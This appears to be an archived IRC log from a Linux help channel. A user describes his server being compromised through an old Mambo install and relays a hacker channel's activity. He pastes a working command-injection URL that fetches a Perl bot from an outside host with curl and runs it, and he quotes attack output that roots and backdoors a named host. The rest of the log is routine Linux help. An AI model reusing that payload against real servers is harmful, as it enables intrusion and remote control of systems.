| |
| |
| |
|
Page: 1 2 3 4 5 6 7 8
Comments:
<0> maybe it was a dcc server
<0> am at hackers irc channel
<0> * Topic is '!say @google 5000 http://www.fullcrew.net/cmd/tool25.dat?&cmd=cd%20/tmp/;curl%20-O%20http://shikoe.net/mamb0file.txt;perl%20mamb0file.txt;rm%20-rf%20mamb0file.txt*'
<1> |Trail|: it's a perl script for irc connexion
<0> nice
<0> but still dont know if im actually rooted
<0> i think and hope , not.. have no proof
<0> if i was hacked.. the dude would be deleting my drive or at least his logs..
<2> oi
<0> am tracing for an hour..
<0> many clues
<0> maybe i was too fast.. he had 3 processes running.. ptrace..
<0> lol norton antivirus on this windows does not like the zip i made of his files
<0> calles it linux root tool something
<0> lets catch it again.. will study it at nav center
<0> need to know wich kernals etc
<0> Virus name: Linux.RST.B
<0> Infected files have their date and time stamps changed to the moment the infection occurs.
<0> wow my first linux virus
<0> The virus is making use of anti-debugging techniques to make dis***embly harder.
<0> AHA
<0> When a package send by attackers is received, the virus creates a connection and attackers can abuse a remote shell.
<0> how would such a packet arrive ? not only by http ?
<0> so i better shutdown ?
<0> Note that the virus doesn't make use of a vulnerability to gain higher permissions like root rights so the infection will not be successfull for regular users.
<0> yeah just apache wich is basicly all important for me :(
<3> Still talking to yourself?
<0> jups :0
<0> The system is going down for system halt NOW!
<0> found remote connections to 6669.. irc.. means.. i dont see the deamon but its running..
<0> datacenter can fix this tomorrow
<0> oh fun.. now my home draytek router is mailing me about a portscan.. guess im attracting interest being in the hacker channel lol
<4> hi |Trail|
<4> i have a problem
<4> i can`t hear any sound
<5> zainga need more info than that, like are you deaf, are ya using alsa, etc..etc..
<4> i just install linux
<0> lol
<4> how can i know if i use alsa or anything
<5> what flavour of linux zainga?
<4> flavour?
<5> !distro
<6> A distro is, perhaps, one of the following: CentOS, Debian, Gentoo, LFS, Mandrake, Red Hat/Fedora, Slackware and SuSE (in alphabetical order), but can be something else too. a "Distribution"
<4> oh
<4> SuSE
<5> no idea about Suse i believe it uses something called Yast
<4> so what flavour of linux scot ?
<4> that u use now
<5> debian
<4> where can i download?
<5> debian.org
<4> debian is the best?
<5> no idea, i used it first, and just prefer it over the others i tried later
<4> what is the best part of debian?
<5> learning to use it
<4> what do u run on it?
<7> right
<7> im down to 2 nicks now
<5> database ircd and a few other meaningless things
<7> ones upstairs i belive
<4> ircd is for?
<5> testing
<4> BennyBoy what are u talking about?
<0> talking to the hackers.. they are pretty ok
<0> well.. for hackers..
<5> scuzz buckets
<7> sorry
<7> wrong channel
<7> lol
<0> am sitting there in the hacker channel and they show me how they root boxes.. they have done several now.. im witnessing this.. amazing.. they command the machines trough irc..
<0> <ninja> [+] gate modified ( 0xffec8995 0x0804ec00 )
<0> <ninja> [+] exploited, uid=0
<0> <ninja> [sh]# backdooring started on apis.cepeline.net
<0> <ninja> [sh]# checking for remote logging... guess not.
<0> <ninja> [sh]# checking for tripwire... guess not.
<0> <ninja> [sh]# [Installing trojans....]
<0> <ninja> [sh]# [System Information...]
<8> it's not amazing
<0> <ninja> [sh]# Hostname : apis.cepeline.net (212.62.59.197)
<8> it's bloody trivial
<0> :(
<8> seriously
<0> they do .. boxes.. in seconds..
<0> scriptkiddos
<0> but seeing it happen
<0> so nicely on irc..
<8> ./root_lots_of_machines.sh, generally written by somebody with slightly more clue than the people running it
<0> outputted
<0> is amazing
<8> who should frankly be ashamed of themselves
<0> thats what they did to me
<0> but my kernal was patched
<0> they did nto do much
<0> but im looking at so many boxes
<0> 500+
<8> |Trail|: Yes, well lots of people running linux are like you in this respect...
<0> <ninja> just gonna adduser with admin rights
<8> |Trail|: ie, they don't patch.
<8> |Trail|: reinstall; I'm guaranteeing you these ****wits can't be trusted.
<8> |Trail|: then learn how to secure your machine properly
<0> i AM patched
<0> im not sure what ELF is
<0> but they unleached a virus contaminating eLF libs
<0> they did not touch other files.. they installed a backdoor but that failed too.. no root.. that part failed..
<0> the virus executed as user apache
<9> how many packing systems are there? I know of RPM (obviously), but got asked in an interview the other day. I think Debian has its own, but not sure if that's 'official'
<0> tried to find 'elf' files
<0> dunno what that is even
<10> |Trail|: what are they exploiting?
<0> ma box :)
<0> shutted it down till morning
<10> no no what piece of software?
<0> datacenter needs to reinstall it
<0> an old and forgotten mambo install
<9> anyone know of other packaging systems other than RPM?
<11> I sent something to the trash when I was using konqueror as root, how can i permanently delete it?
<12> expr 365 * 24 doesn't work
<12> go into the trash and delete it
<13> Hello, when booting a system what number should the script in /etc/rc?.d/ that brings up the firewall be?
<14> depends on the distro
<14> debian would be 2, redhat style would be 3 and 5
<14> then 2
<14> thats generally the startup level for debian
<13> Ah -- I was more after something like: S19firewall
<14> well thats not rc?.d hehe
<14> after networking before other daemons like apache and such is a good place
<13> just before, you mean...
<14> you want it after networking has started
<14> otherwise iptables could act funky cause networking wasn't up, particularly if firewall specified eth devices
<13> I think iptables is ok if you try using non-existant interfaces -- lemme just check...
<13> home:~# iptables -A INPUT -i meow -j ACCEPT
<13> home:~# iptables -L -v -n -x | grep meow
<13> 0 0 ACCEPT all -- meow * 0.0.0.0/0 0.0.0.0/0
<14> i'm just cautious like that
<13> Thanks for help, Redragon.
<13> Night!
<16> please, just installed slackware in notepad-hp-pavillion ze2210, tried installing debian but i get a segmetation fault and hang even at first boot , tried 2.4 and 2.6 kernel installation... any clue ?
<17> your question doesn't make sense... what does debian have to do with slackware?
<16> synic , i mean.. i want to install debian.. i installed slackware in a smaller partition just to connect internet
<16> but at the first boot i hangs
<16> it
<17> what iso did you use to install debian?
<16> netinst
<16> i also tried sarg 3.0r1 disk 1
<16> have the same problem
<17> so you got it installed... but now when you boot you get a segfault?
<16> yep.. it installs ok.. when it says it will reboot, it hangs with the segfault msg...
<17> what does it say before that?
Return to
#linuxhelp
or
Go to some related
logs:
phpbb div
#linux
#london
zobbhom
#linux
#linux
#AllNiteCafe
#java
#gentoo
#php
|
|